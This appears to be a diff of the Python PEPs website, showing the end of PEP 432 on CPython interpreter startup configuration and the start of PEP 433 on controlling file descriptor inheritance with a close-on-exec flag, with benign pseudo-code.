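        raise ImportError("no module named %r" % name)
    if spec.submodule_search_locations is not None:
        # The loader says this is a package: run its __main__ submodule
        if name.endswith(".__main__"):
            raise ImportError("%r has no runnable __main__" % name)
        return resolve_main_module(name + ".__main__")
    return name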

+
+
+

Executing the main module

+
+

Note

+

In PEP 587, PyRun_PrepareMain and PyRun_ExecMain are not exposed separately, and are instead accessed through a Py_RunMain API that both prepares and executes main, and then finalizes the Python interpreter.

This subphase covers the execution of the actual __main__ module code.

It is handled by calling the following API:

+
int PyRun_ExecMain();
+
+
+

This operation is only permitted for the main interpreter, and will raise RuntimeError when invoked from a thread where the current thread state belongs to a subinterpreter.

The actual processing is driven by the main related settings stored in the interpreter state as part of the configuration struct.

If both main_stream and main_code are NULL, this call does nothing.

If both main_stream and main_code are set, RuntimeError will be reported.

If main_stream and prompt_stream are both set, main execution will be delegated to a new internal API:

int _PyRun_InteractiveMain(PyObject *input, PyObject *output);

If main_stream is set and prompt_stream is NULL, main execution will be delegated to a new internal API:

int _PyRun_StreamInMain(PyObject *input);

If main_code is set, main execution will be delegated to a new internal API:

int _PyRun_CodeInMain(PyCodeObject *code);

After execution of main completes, if inspect_main is set, or the PYTHONINSPECT environment variable has been set, then PyRun_ExecMain will invoke _PyRun_InteractiveMain(sys.__stdin__, sys.__stdout__).
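Taken together, these rules form a small dispatch table. A Python-level sketch of that dispatch (illustrative pseudo-code only; the _PyRun_* names are the proposed internal APIs, which would be implemented in C):

def exec_main(config):
    if config.main_stream is None and config.main_code is None:
        return 0  # nothing to execute
    if config.main_stream is not None and config.main_code is not None:
        raise RuntimeError("main_stream and main_code are mutually exclusive")
    if config.main_stream is not None:
        if config.prompt_stream is not None:
            return _PyRun_InteractiveMain(config.main_stream, config.prompt_stream)
        return _PyRun_StreamInMain(config.main_stream)
    return _PyRun_CodeInMain(config.main_code)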

+
+
+

Internal Storage of Configuration Data

+

The interpreter state will be updated to include details of the configuration settings supplied during initialization by extending the interpreter state object with at least an embedded copy of the PyConfigAsObjects and PyInterpreterConfig structs.

For debugging purposes, the configuration settings will be exposed as a sys._configuration simple namespace (similar to sys.flags and sys.implementation). The attributes will themselves be simple namespaces corresponding to the two levels of configuration setting:

• all_interpreters
• active_interpreter

Field names will match those in the configuration structs, except for hash_seed, which will be deliberately excluded.

An underscored attribute is chosen deliberately, as these configuration settings are part of the CPython implementation, rather than part of the Python language definition. If new settings are needed to support cross-implementation compatibility in the standard library, then those should be agreed with the other implementations and exposed as new required attributes on sys.implementation, as described in PEP 421.

These are snapshots of the initial configuration settings. They are not modified by the interpreter during runtime (except as noted above).
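For example, debugging code could inspect the proposed namespace like this (illustrative only: sys._configuration does not exist in released CPython, and the exact field split is subject to the NOTE earlier in this PEP):

import sys

config = getattr(sys, "_configuration", None)
if config is not None:
    shared = config.all_interpreters     # settings shared by every interpreter
    current = config.active_interpreter  # per-interpreter settings
    print(shared.import_path)            # field names mirror PyConfigAsObjects
    print(current.is_main_interpreter)   # the one per-interpreter field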

+
+
+

Creating and Configuring Subinterpreters

+

As the new configuration settings are stored in the interpreter state, they need to be initialised when a new subinterpreter is created. This turns out to be trickier than one might expect due to PyThreadState_Swap(NULL); (which is fortunately exercised by CPython's own embedding tests, allowing this problem to be detected during development).

To provide a straightforward solution for this case, the PEP proposes to add a new API:

+
PyInterpreterState *PyInterpreterState_Main();
+
+
+

This will be a counterpart to PyInterpreterState_Head(), only reporting the oldest currently existing interpreter rather than the newest. If Py_NewInterpreter() is called from a thread with an existing thread state, then the interpreter configuration for that thread will be used when initialising the new subinterpreter. If there is no current thread state, the configuration from PyInterpreterState_Main() will be used.

While the existing PyInterpreterState_Head() API could be used instead, that reference changes as subinterpreters are created and destroyed, while PyInterpreterState_Main() will always refer to the initial interpreter state created in Py_InitializeRuntime().

A new constraint is also added to the embedding API: attempting to delete the main interpreter while subinterpreters still exist will now be a fatal error.

+
+
+

Stable ABI

+

Most of the APIs proposed in this PEP are excluded from the stable ABI, as embedding a Python interpreter involves a much higher degree of coupling than merely writing an extension module.

The only newly exposed APIs that will be part of the stable ABI are the Py_IsInitializing() and Py_IsRuntimeInitialized() queries.

+
+
+

Build time configuration

+

This PEP makes no changes to the handling of build time configuration settings, and thus has no effect on the contents of sys.implementation or the result of sysconfig.get_config_vars().

+
+
+

Backwards Compatibility

+

Backwards compatibility will be preserved primarily by ensuring that Py_BuildPythonConfig() interrogates all the previously defined configuration settings stored in global variables and environment variables, and that Py_InitializeMainInterpreter() writes affected settings back to the relevant locations.

One acknowledged incompatibility is that some environment variables which are currently read lazily may instead be read once during interpreter initialization. As the reference implementation matures, these will be discussed in more detail on a case-by-case basis. The environment variables which are currently known to be looked up dynamically are:

• PYTHONCASEOK: writing to os.environ['PYTHONCASEOK'] will no longer dynamically alter the interpreter's handling of filename case differences on import (TBC)
• PYTHONINSPECT: os.environ['PYTHONINSPECT'] will still be checked after execution of the __main__ module terminates

The Py_Initialize() style of initialization will continue to be supported. It will use (at least some elements of) the new API internally, but will continue to exhibit the same behaviour as it does today, ensuring that sys.argv is not populated until a subsequent PySys_SetArgv call (TBC). All APIs that currently support being called prior to Py_Initialize() will continue to do so, and will also support being called prior to Py_InitializeRuntime().

+
+
+
+

A System Python Executable

+

When executing system utilities with administrative access to a system, many of the default behaviours of CPython are undesirable, as they may allow untrusted code to execute with elevated privileges. The most problematic aspects are the fact that user site directories are enabled, environment variables are trusted, and that the directory containing the executed file is placed at the beginning of the import path.

Issue 16499 [6] added a -I option to change the behaviour of the normal CPython executable, but this is a hard to discover solution (and adds yet another option to an already complex CLI). This PEP proposes to instead add a separate system-python executable.

Currently, providing a separate executable with different default behaviour would be prohibitively hard to maintain. One of the goals of this PEP is to make it possible to replace much of the hard to maintain bootstrapping code with more normal CPython code, as well as making it easier for a separate application to make use of key components of Py_Main. Including this change in the PEP is designed to help avoid acceptance of a design that sounds good in theory but proves to be problematic in practice.

Cleanly supporting this kind of "alternate CLI" is the main reason for the proposed changes to better expose the core logic for deciding between the different execution modes supported by CPython:

• script execution
• directory/zipfile execution
• command execution ("-c" switch)
• module or package execution ("-m" switch)
• execution from stdin (non-interactive)
• interactive stdin

Actually implementing this may also reveal the need for some better argument parsing infrastructure for use during the initializing phase.

+
+
+

Open Questions

+
• Error details for Py_BuildPythonConfig and Py_InitializeMainInterpreter (these should become clearer as the implementation progresses)
+
+

Implementation

+

The reference implementation is being developed as a private API refactoring within the CPython reference interpreter (as attempting to maintain it as an independent project proved impractical).

PEP 587 extracts a subset of the proposal that is considered sufficiently stable to be worth proposing as a public API for Python 3.8.

+
+
+

The Status Quo (as of Python 3.6)

+

The current mechanisms for configuring the interpreter have accumulated in a fairly ad hoc fashion over the past 20+ years, leading to a rather inconsistent interface with varying levels of documentation.

Also see PEP 587 for further discussion of the existing settings and their handling.

(Note: some of the info below could probably be cleaned up and added to the C API documentation for 3.x - it's all CPython specific, so it doesn't belong in the language reference.)

+
+

Ignoring Environment Variables

+

The -E command line option allows all environment variables to be ignored when initializing the Python interpreter. An embedding application can enable this behaviour by setting Py_IgnoreEnvironmentFlag before calling Py_Initialize().

In the CPython source code, the Py_GETENV macro implicitly checks this flag, and always produces NULL if it is set.

<TBD: I believe PYTHONCASEOK is checked regardless of this setting>
<TBD: Does -E also ignore Windows registry keys?>

+
+
+

Randomised Hashing

+

The randomised hashing is controlled via the -R command line option (in releases prior to 3.3), as well as the PYTHONHASHSEED environment variable.

In Python 3.3, only the environment variable remains relevant. It can be used to disable randomised hashing (by using a seed value of 0) or else to force a specific hash value (e.g. for repeatability of testing, or to share hash values between processes).

However, embedding applications must use the Py_HashRandomizationFlag to explicitly request hash randomisation (CPython sets it in Py_Main() rather than in Py_Initialize()).

The new configuration API should make it straightforward for an embedding application to reuse the PYTHONHASHSEED processing with a text based configuration setting provided by other means (e.g. a config file or separate environment variable).
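For reference, the existing environment variable behaviour is easy to demonstrate from Python itself (a small, self-contained check):

import os, subprocess, sys

def hash_of_spam(seed):
    env = dict(os.environ, PYTHONHASHSEED=seed)
    out = subprocess.check_output(
        [sys.executable, "-c", "print(hash('spam'))"], env=env)
    return int(out)

# A fixed seed (including 0, which disables randomisation) gives
# repeatable hashes across interpreter processes:
assert hash_of_spam("0") == hash_of_spam("0")
assert hash_of_spam("12345") == hash_of_spam("12345")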

+
+
+

Locating Python and the standard library

+

The location of the Python binary and the standard library is influenced by several elements. The algorithm used to perform the calculation is not documented anywhere other than in the source code [3], [4]. Even that description is incomplete, as it failed to be updated for the virtual environment support added in Python 3.3 (detailed in PEP 405).

These calculations are affected by the following function calls (made prior to calling Py_Initialize()) and environment variables:

• Py_SetProgramName()
• Py_SetPythonHome()
• PYTHONHOME

The filesystem is also inspected for pyvenv.cfg files (see PEP 405) or, failing that, a lib/os.py (Windows) or lib/python$VERSION/os.py file.

The build time settings for PREFIX and EXEC_PREFIX are also relevant, as are some registry settings on Windows. The hardcoded fallbacks are based on the layout of the CPython source tree and build output when working in a source checkout.

+
+
+

Configuring sys.path

+

An embedding application may call Py_SetPath() prior to Py_Initialize() to completely override the calculation of sys.path. It is not straightforward to only allow some of the calculations, as modifying sys.path after initialization is already complete means those modifications will not be in effect when standard library modules are imported during the startup sequence.

If Py_SetPath() is not used prior to the first call to Py_GetPath() (implicit in Py_Initialize()), then it builds on the location data calculations above to calculate suitable path entries, along with the PYTHONPATH environment variable.

<TBD: On Windows, there's also a bunch of stuff to do with the registry>

The site module, which is implicitly imported at startup (unless disabled via the -S option), adds additional paths to this initial set of paths, as described in its documentation [5].

The -s command line option can be used to exclude the user site directory from the list of directories added. Embedding applications can control this by setting the Py_NoUserSiteDirectory global variable.

The following commands can be used to check the default path configurations for a given Python executable on a given system:

• ./python -c "import sys, pprint; pprint.pprint(sys.path)" - standard configuration
• ./python -s -c "import sys, pprint; pprint.pprint(sys.path)" - user site directory disabled
• ./python -S -c "import sys, pprint; pprint.pprint(sys.path)" - all site path modifications disabled

(Note: you can see similar information using -m site instead of -c, but this is slightly misleading as it calls os.path.abspath on all of the path entries, making relative path entries look absolute. Using the site module also causes problems in the last case, as on Python versions prior to 3.3, explicitly importing site will carry out the path modifications -S avoids, while on 3.3+ combining -m site with -S currently fails.)

+

The calculation of sys.path[0] is comparatively straightforward:

• For an ordinary script (Python source or compiled bytecode), sys.path[0] will be the directory containing the script.
• For a valid sys.path entry (typically a zipfile or directory), sys.path[0] will be that path.
• For an interactive session, running from stdin or when using the -c or -m switches, sys.path[0] will be the empty string, which the import system interprets as allowing imports from the current directory (a quick check of this case follows below).
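The -c case can be checked directly (output as observed on the CPython versions this PEP discusses; later releases may alter or omit the entry):

import subprocess, sys

out = subprocess.check_output(
    [sys.executable, "-c", "import sys; print(repr(sys.path[0]))"])
print(out.decode().strip())   # '' - the empty string standing in for the cwd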
+
+

Configuring sys.argv

+

Unlike most other settings discussed in this PEP, sys.argv is not set implicitly by Py_Initialize(). Instead, it must be set via an explicit call to PySys_SetArgv().

CPython calls this in Py_Main() after calling Py_Initialize(). The calculation of sys.argv[1:] is straightforward: they're the command line arguments passed after the script name or the argument to the -c or -m options.

+

The calculation of sys.argv[0] is a little more complicated:

• For an ordinary script (source or bytecode), it will be the script name.
• For a sys.path entry (typically a zipfile or directory) it will initially be the zipfile or directory name, but will later be changed by the runpy module to the full path to the imported __main__ module.
• For a module specified with the -m switch, it will initially be the string "-m", but will later be changed by the runpy module to the full path to the executed module.
• For a package specified with the -m switch, it will initially be the string "-m", but will later be changed by the runpy module to the full path to the executed __main__ submodule of the package.
• For a command executed with -c, it will be the string "-c".
• For explicitly requested input from stdin, it will be the string "-".
• Otherwise, it will be the empty string.

Embedding applications must call PySys_SetArgv themselves. The CPython logic for doing so is part of Py_Main() and is not exposed separately. However, the runpy module does provide roughly equivalent logic in runpy.run_module and runpy.run_path.
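For example, any Python code can reuse that logic directly; a minimal sketch (mypkg is an assumed, importable package name):

import runpy

# Roughly what "python -m mypkg" does: import parent packages, resolve
# mypkg to mypkg.__main__ if it is a package, then execute the result
# with __name__ == "__main__", updating sys.argv[0] along the way.
main_globals = runpy.run_module("mypkg", run_name="__main__", alter_sys=True)

# Roughly "python some/path" for a script, directory or zipfile:
# main_globals = runpy.run_path("some/path", run_name="__main__")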

+
+
+

Other configuration settings

+

TBD: Cover the initialization of the following in more detail:

• Completely disabling the import system
• The initial warning system state:
    • sys.warnoptions
    • (-W option, PYTHONWARNINGS)
• Arbitrary extended options (e.g. to automatically enable faulthandler):
    • sys._xoptions
    • (-X option)
• The filesystem encoding used by:
    • sys.getfilesystemencoding
    • os.fsencode
    • os.fsdecode
• The IO encoding and buffering used by:
    • sys.stdin
    • sys.stdout
    • sys.stderr
    • (-u option, PYTHONIOENCODING, PYTHONUNBUFFEREDIO)
• Whether or not to implicitly cache bytecode files:
    • sys.dont_write_bytecode
    • (-B option, PYTHONDONTWRITEBYTECODE)
• Whether or not to enforce correct case in filenames on case-insensitive platforms:
    • os.environ["PYTHONCASEOK"]
• The other settings exposed to Python code in sys.flags:
    • debug (enable debugging output in the pgen parser)
    • inspect (enter interactive interpreter after __main__ terminates)
    • interactive (treat stdin as a tty)
    • optimize (__debug__ status, write .pyc or .pyo, strip doc strings)
    • no_user_site (don't add the user site directory to sys.path)
    • no_site (don't implicitly import site during startup)
    • ignore_environment (whether environment vars are used during config)
    • verbose (enable all sorts of random output)
    • bytes_warning (warnings/errors for implicit str/bytes interaction)
    • quiet (disable banner output even if verbose is also enabled or stdin is a tty and the interpreter is launched in interactive mode)
• Whether or not CPython's signal handlers should be installed

Much of the configuration of CPython is currently handled through C level global variables:

Py_BytesWarningFlag (-b option)
Py_DebugFlag (-d option)
Py_InspectFlag (-i option, PYTHONINSPECT)
Py_InteractiveFlag (property of stdin, cannot be overridden)
Py_OptimizeFlag (-O option, PYTHONOPTIMIZE)
Py_DontWriteBytecodeFlag (-B option, PYTHONDONTWRITEBYTECODE)
Py_NoUserSiteDirectory (-s option, PYTHONNOUSERSITE)
Py_NoSiteFlag (-S option)
Py_UnbufferedStdioFlag (-u option, PYTHONUNBUFFEREDIO)
Py_VerboseFlag (-v option, PYTHONVERBOSE)
+
+
+

For the above variables, the conversion of command line options and environment variables to C global variables is handled by Py_Main, so each embedding application must set those appropriately in order to change them from their defaults.

Some configuration can only be provided as OS level environment variables:

PYTHONSTARTUP
PYTHONCASEOK
PYTHONIOENCODING

The Py_InitializeEx() API also accepts a boolean flag to indicate whether or not CPython's signal handlers should be installed.

Finally, some interactive behaviour (such as printing the introductory banner) is triggered only when standard input is reported as a terminal connection by the operating system.

TBD: Document how the "-x" option is handled (skips processing of the first comment line in the main script)

Also see detailed sequence of operations notes at [1].

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0432.rst

+

Last modified: 2023-10-11 12:05:51 GMT

\ No newline at end of file
diff --git a/pep-0433/index.html b/pep-0433/index.html
new file mode 100644
index 00000000000..83e2c6506ce
--- /dev/null
+++ b/pep-0433/index.html
@@ -0,0 +1,849 @@

PEP 433 – Easier suppression of file descriptor inheritance | peps.python.org
+
+


+ + +
+
+
+

PEP 433 – Easier suppression of file descriptor inheritance

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
10-Jan-2013
+
Python-Version:
+
3.4
+
Superseded-By:
+
446
+
+
+
+
+
+

Abstract

+

Add a new optional cloexec parameter on functions creating file descriptors, add different ways to change default values of this parameter, and add four new functions:

• os.get_cloexec(fd)
• os.set_cloexec(fd, cloexec=True)
• sys.getdefaultcloexec()
• sys.setdefaultcloexec(cloexec)
+
+

Rationale

+

A file descriptor has a close-on-exec flag which indicates if the file descriptor will be inherited or not.

On UNIX, if the close-on-exec flag is set, the file descriptor is not inherited: it will be closed at the execution of child processes; otherwise the file descriptor is inherited by child processes.

On Windows, if the close-on-exec flag is set, the file descriptor is not inherited; the file descriptor is inherited by child processes if the close-on-exec flag is cleared and if CreateProcess() is called with the bInheritHandles parameter set to TRUE (when subprocess.Popen is created with close_fds=False for example). Windows does not have a "close-on-exec" flag but an inheritance flag which is just the opposite value. For example, setting the close-on-exec flag means clearing the HANDLE_FLAG_INHERIT flag of a handle.

+
+

Status in Python 3.3

+

On UNIX, the subprocess module closes file descriptors greater than 2 by default since Python 3.2 [1]. All file descriptors created by the parent process are automatically closed in the child process.

xmlrpc.server.SimpleXMLRPCServer sets the close-on-exec flag of the listening socket, whereas the parent class socketserver.TCPServer does not set this flag.

There are other cases creating a subprocess or executing a new program where file descriptors are not closed: functions of the os.spawn*() and the os.exec*() families, and third party modules calling exec() or fork() + exec(). In this case, file descriptors are shared between the parent and the child processes, which is usually unexpected and causes various issues.

This PEP proposes to continue the work started with the change in the subprocess module in Python 3.2, to fix the issue in any code, and not just code using subprocess.

+
+
+

Inherited file descriptors issues

+

Closing the file descriptor in the parent process does not close the related resource (file, socket, …) because it is still open in the child process.

The listening socket of TCPServer is not closed on exec(): the child process is able to get connections from new clients; if the parent closes the listening socket and creates a new listening socket on the same address, it would get an "address already in use" error.

Not closing file descriptors can lead to resource exhaustion: even if the parent closes all files, creating a new file descriptor may fail with "too many files" because files are still open in the child process.

See also the following issues:

+ +
+
+

Security

+

Leaking file descriptors is a major security vulnerability. An untrusted child process can read sensitive data like passwords and take control of the parent process through leaked file descriptors. It is for example a known vulnerability to escape from a chroot.

See also the CERT recommendation: FIO42-C. Ensure files are properly closed when they are no longer needed.

Examples of vulnerabilities:

+ +
+
+

Atomicity

+

Using fcntl() to set the close-on-exec flag is not safe in a multithreaded application. If a thread calls fork() and exec() between the creation of the file descriptor and the call to fcntl(fd, F_SETFD, new_flags), the file descriptor will be inherited by the child process. Modern operating systems offer functions to set the flag during the creation of the file descriptor, which avoids the race condition.
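The racy pattern looks like this at the Python level (a deliberately non-atomic sketch; the marked window is where a concurrent fork() + exec() in another thread leaks the descriptor):

import fcntl, os

fd = os.open("/etc/hostname", os.O_RDONLY)
# <-- race window: a fork() + exec() here inherits fd
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)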

+
+
+

Portability

+

Python 3.2 added the socket.SOCK_CLOEXEC flag, and Python 3.3 added the os.O_CLOEXEC flag and the os.pipe2() function. It is already possible in Python 3.3 to atomically set the close-on-exec flag when opening a file and creating a pipe or socket.

The problem is that these flags and functions are not portable: only recent versions of operating systems support them. The O_CLOEXEC and SOCK_CLOEXEC flags are ignored by old Linux versions and so the FD_CLOEXEC flag must be checked using fcntl(fd, F_GETFD). If the kernel ignores the O_CLOEXEC or SOCK_CLOEXEC flag, a call to fcntl(fd, F_SETFD, flags) is required to set the close-on-exec flag.
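A defensive version of that check, sketched in Python (os.O_CLOEXEC only exists on Python 3.3+ and supporting platforms, hence the getattr() guard):

import fcntl, os

fd = os.open("/etc/hostname", os.O_RDONLY | getattr(os, "O_CLOEXEC", 0))
if not fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC:
    # The kernel ignored O_CLOEXEC (or it was unavailable): set it manually.
    flags = fcntl.fcntl(fd, fcntl.F_GETFD)
    fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)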

+
+

Note

+

OpenBSD older than 5.2 does not close the file descriptor with the close-on-exec flag set if fork() is used before exec(), but it works correctly if exec() is called without fork(). Try openbsd_bug.py.

+
+
+
+

Scope

+

Applications still have to close file descriptors explicitly after a fork(). The close-on-exec flag only closes file descriptors after exec(), and so after fork() + exec().

This PEP only changes the close-on-exec flag of file descriptors created by the Python standard library, or by modules using the standard library. Third party modules not using the standard library should be modified to conform to this PEP. The new os.set_cloexec() function can be used for example.

Note

See Close file descriptors after fork for a possible solution for fork() without exec().

+
+
+
+
+

Proposal

+

Add a new optional cloexec parameter on functions creating file descriptors, and different ways to change the default value of this parameter.

Add new functions:

+
• os.get_cloexec(fd:int) -> bool: get the close-on-exec flag of a file descriptor. Not available on all platforms.
• os.set_cloexec(fd:int, cloexec:bool=True): set or clear the close-on-exec flag on a file descriptor. Not available on all platforms.
• sys.getdefaultcloexec() -> bool: get the current default value of the cloexec parameter.
• sys.setdefaultcloexec(cloexec: bool): set the default value of the cloexec parameter.
+

Add a new optional cloexec parameter to:

• asyncore.dispatcher.create_socket()
• io.FileIO
• io.open()
• open()
• os.dup()
• os.dup2()
• os.fdopen()
• os.open()
• os.openpty()
• os.pipe()
• select.devpoll()
• select.epoll()
• select.kqueue()
• socket.socket()
• socket.socket.accept()
• socket.socket.dup()
• socket.socket.fromfd()
• socket.socketpair()

The default value of the cloexec parameter is sys.getdefaultcloexec().

Add a new command line option -e and an environment variable PYTHONCLOEXEC to set the close-on-exec flag by default.

subprocess clears the close-on-exec flag of file descriptors of the pass_fds parameter.

All functions creating file descriptors in the standard library must respect the default value of the cloexec parameter: sys.getdefaultcloexec().

File descriptors 0 (stdin), 1 (stdout) and 2 (stderr) are expected to be inherited, but Python does not handle them differently. When os.dup2() is used to replace standard streams, cloexec=False must be specified explicitly (see the sketch below).
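A sketch of that situation using the proposed parameter (illustrative only: the cloexec parameter is this PEP's proposal, not an API in released Python):

import os

log_fd = os.open("child_stderr.log", os.O_WRONLY | os.O_CREAT)
# The new stderr must stay inheritable by child processes, so the
# caller opts out of the (possibly True) default explicitly:
os.dup2(log_fd, 2, cloexec=False)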

+

Drawbacks of the proposal:

+
• It is no longer possible to know if the close-on-exec flag will be set or not on a newly created file descriptor just by reading the source code.
• If the inheritance of a file descriptor matters, the cloexec parameter must now be specified explicitly, or the library or the application will not work depending on the default value of the cloexec parameter.
+
+

Alternatives

+
+

Inheritance enabled by default, default not configurable

+

Add a new optional cloexec parameter on functions creating file descriptors. The default value of the cloexec parameter is False, and this default cannot be changed. File descriptor inheritance enabled by default is also the default on POSIX and on Windows. This alternative is the most conservative option.

This option does not solve the issues listed in the Rationale section, it only provides a helper to fix them. All functions creating file descriptors have to be modified to set cloexec=True in each module used by an application to fix all these issues.

+
+
+

Inheritance enabled by default, default can only be set to True

+

This alternative is based on the proposal: the only difference is that sys.setdefaultcloexec() does not take any argument, it can only be used to set the default value of the cloexec parameter to True.

+
+
+

Disable inheritance by default

+

This alternative is based on the proposal: the only difference is that the default value of the cloexec parameter is True (instead of False).

If a file must be inherited by child processes, the cloexec=False parameter can be used.

Advantages of setting the close-on-exec flag by default:

+ +

Drawbacks of setting the close-on-exec flag by default:

• It violates the principle of least surprise. Developers using the os module may expect that Python respects the POSIX standard and so that the close-on-exec flag is not set by default.
• The os module is written as a thin wrapper to system calls (to functions of the C standard library). If atomic flags to set the close-on-exec flag are not supported (see Appendix: Operating system support), a single Python function call may call 2 or 3 system calls (see the Performances section).
• Extra system calls, if any, may slow down Python: see Performances.

Backward compatibility: only a few programs rely on inheritance of file descriptors, and they only pass a few file descriptors, usually just one. These programs will fail immediately with an EBADF error, and it will be simple to fix them: add the cloexec=False parameter or use os.set_cloexec(fd, False).

The subprocess module will be changed anyway to clear the close-on-exec flag on file descriptors listed in the pass_fds parameter of the Popen constructor. So it is possible that these programs will not need any fix if they use the subprocess module.

+
+
+

Close file descriptors after fork

+

This PEP does not fix issues with applications using fork() without exec(). Python needs a generic process to register callbacks which would be called after a fork, see #16500: Add an atfork module. Such a registry could be used to close file descriptors just after a fork().

Drawbacks:

• It does not solve the problem on Windows: fork() does not exist on Windows.
• This alternative does not solve the problem for programs using exec() without fork().
• A third party module may call the C function fork() directly, which will not call "atfork" callbacks.
• All functions creating file descriptors must be changed to register a callback and then unregister their callback when the file is closed. Or a list of all open file descriptors must be maintained.
• The operating system is a better place than Python to close file descriptors automatically. For example, it is not easy to avoid a race condition between closing the file and unregistering the callback closing the file.
+
+
+

open(): add “e” flag to mode

+

A new "e" mode would set the close-on-exec flag (best-effort).

This alternative only solves the problem for open(). socket.socket() and os.pipe() do not have a mode parameter, for example.

Since its version 2.7, the GNU libc supports the "e" flag for fopen(). It uses O_CLOEXEC if available, or uses fcntl(fd, F_SETFD, FD_CLOEXEC). With Visual Studio, fopen() accepts an "N" flag which uses O_NOINHERIT.

+
+
+

Bikeshedding on the name of the new parameter

+
• inherit, inherited: closer to the Windows definition
• sensitive
• sterile: "Does not produce offspring."
+
+
+

Applications using inheritance of file descriptors

+

Most developers don't know that file descriptors are inherited by default. Most programs do not rely on inheritance of file descriptors. For example, subprocess.Popen was changed in Python 3.2 to close all file descriptors greater than 2 in the child process by default. No user complained about this behavior change yet.

Network servers using fork may want to pass the client socket to the child process. For example, on UNIX a CGI server passes the client socket through file descriptors 0 (stdin) and 1 (stdout) using dup2().

To access a restricted resource like creating a socket listening on a TCP port lower than 1024 or reading a file containing sensitive data like passwords, a common practice is: start as the root user, create a file descriptor, create a child process, drop privileges (ex: change the current user), pass the file descriptor to the child process and exit the parent process.

Security is very important in such a use case: leaking another file descriptor would be a critical security vulnerability (see Security). The root process may not exit but instead monitor the child process, and restart a new child process and pass the same file descriptor if the previous child process crashed.

+

Examples of programs taking file descriptors from the parent process using a command line option:

• gpg: --status-fd <fd>, --logger-fd <fd>, etc.
• openssl: -pass fd:<fd>
• qemu: -add-fd <fd>
• valgrind: --log-fd=<fd>, --input-fd=<fd>, etc.
• xterm: -S <fd>

On Linux, it is possible to use the "/dev/fd/<fd>" filename to pass a file descriptor to a program expecting a filename.
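Combined with the subprocess module's pass_fds parameter (available since Python 3.2), this allows handing a pipe to a child that only accepts filenames; a minimal Linux sketch:

import os, subprocess

r, w = os.pipe()
os.write(w, b"hello from the parent\n")
os.close(w)
# pass_fds keeps r open in the child; /dev/fd/<r> names it as a file.
subprocess.check_call(["cat", "/dev/fd/%d" % r], pass_fds=[r])
os.close(r)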

+
+
+

Performances

+

Setting the close-on-exec flag may require additional system calls for each creation of new file descriptors. The number of additional system calls depends on the method used to set the flag:

• O_NOINHERIT: no additional system call
• O_CLOEXEC: one additional system call, but only at the creation of the first file descriptor, to check if the flag is supported. If the flag is not supported, Python has to fall back to the next method.
• ioctl(fd, FIOCLEX): one additional system call per file descriptor
• fcntl(fd, F_SETFD, flags): two additional system calls per file descriptor, one to get the old flags and one to set the new flags

On Linux, setting the close-on-exec flag has a low overhead on performances. Results of bench_cloexec.py on Linux 3.6:

• close-on-exec flag not set: 7.8 µs
• O_CLOEXEC: 1% slower (7.9 µs)
• ioctl(): 3% slower (8.0 µs)
• fcntl(): 3% slower (8.0 µs)
+
+

Implementation

+
+

os.get_cloexec(fd)

+

Get the close-on-exec flag of a file descriptor.

+

Pseudo-code:

+
if os.name == 'nt':
    def get_cloexec(fd):
        handle = _winapi._get_osfhandle(fd)
        flags = _winapi.GetHandleInformation(handle)
        # Windows stores the opposite: the inheritance flag
        return not (flags & _winapi.HANDLE_FLAG_INHERIT)
else:
    try:
        import fcntl
    except ImportError:
        pass
    else:
        def get_cloexec(fd):
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
            return bool(flags & fcntl.FD_CLOEXEC)
+
+
+
+

os.set_cloexec(fd, cloexec=True)

+

Set or clear the close-on-exec flag on a file descriptor. The flag is set after the creation of the file descriptor and so it is not atomic.

+

Pseudo-code:

+
if os.name == 'nt':
    def set_cloexec(fd, cloexec=True):
        handle = _winapi._get_osfhandle(fd)
        mask = _winapi.HANDLE_FLAG_INHERIT
        if cloexec:
            flags = 0
        else:
            flags = mask
        _winapi.SetHandleInformation(handle, mask, flags)
else:
    # Note: 'ioctl' is a hypothetical module in this pseudo-code
    # (CPython actually exposes ioctl() via the fcntl module)
    fcntl = None
    ioctl = None
    try:
        import ioctl
    except ImportError:
        try:
            import fcntl
        except ImportError:
            pass
    if ioctl is not None and hasattr(ioctl, 'FIOCLEX'):
        def set_cloexec(fd, cloexec=True):
            if cloexec:
                ioctl.ioctl(fd, ioctl.FIOCLEX)
            else:
                ioctl.ioctl(fd, ioctl.FIONCLEX)
    elif fcntl is not None:
        def set_cloexec(fd, cloexec=True):
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
            if cloexec:
                flags |= fcntl.FD_CLOEXEC
            else:
                flags &= ~fcntl.FD_CLOEXEC
            fcntl.fcntl(fd, fcntl.F_SETFD, flags)
+
+
+

ioctl is preferred over fcntl because it requires only one syscall, instead of two syscalls for fcntl.

+
+

Note

+

fcntl(fd, F_SETFD, flags) only supports one flag (FD_CLOEXEC), so it would be possible to avoid fcntl(fd, F_GETFD). But setting the flags directly may drop other flags in the future, and so it is safer to keep the two function calls.

+
+
+

Note

+

The fopen() function of the GNU libc ignores the error if fcntl(fd, F_SETFD, flags) fails.

+
+
+
+

open()

+
• Windows: open() with O_NOINHERIT flag [atomic]
• open() with O_CLOEXEC flag [atomic]
• open() + os.set_cloexec(fd, True) [best-effort]
+
+
+

os.dup()

+
• Windows: DuplicateHandle() [atomic]
• fcntl(fd, F_DUPFD_CLOEXEC) [atomic]
• dup() + os.set_cloexec(fd, True) [best-effort]
+
+
+

os.dup2()

+
• fcntl(fd, F_DUP2FD_CLOEXEC, fd2) [atomic]
• dup3() with O_CLOEXEC flag [atomic]
• dup2() + os.set_cloexec(fd, True) [best-effort]
+
+
+

os.pipe()

+
• Windows: CreatePipe() with SECURITY_ATTRIBUTES.bInheritHandle=FALSE, or _pipe() with O_NOINHERIT flag [atomic]
• pipe2() with O_CLOEXEC flag [atomic]
• pipe() + os.set_cloexec(fd, True) [best-effort]
+
+
+

socket.socket()

+
• Windows: WSASocket() with WSA_FLAG_NO_HANDLE_INHERIT flag [atomic]
• socket() with SOCK_CLOEXEC flag [atomic]
• socket() + os.set_cloexec(fd, True) [best-effort]
+
+
+

socket.socketpair()

+
• socketpair() with SOCK_CLOEXEC flag [atomic]
• socketpair() + os.set_cloexec(fd, True) [best-effort]
+
+
+

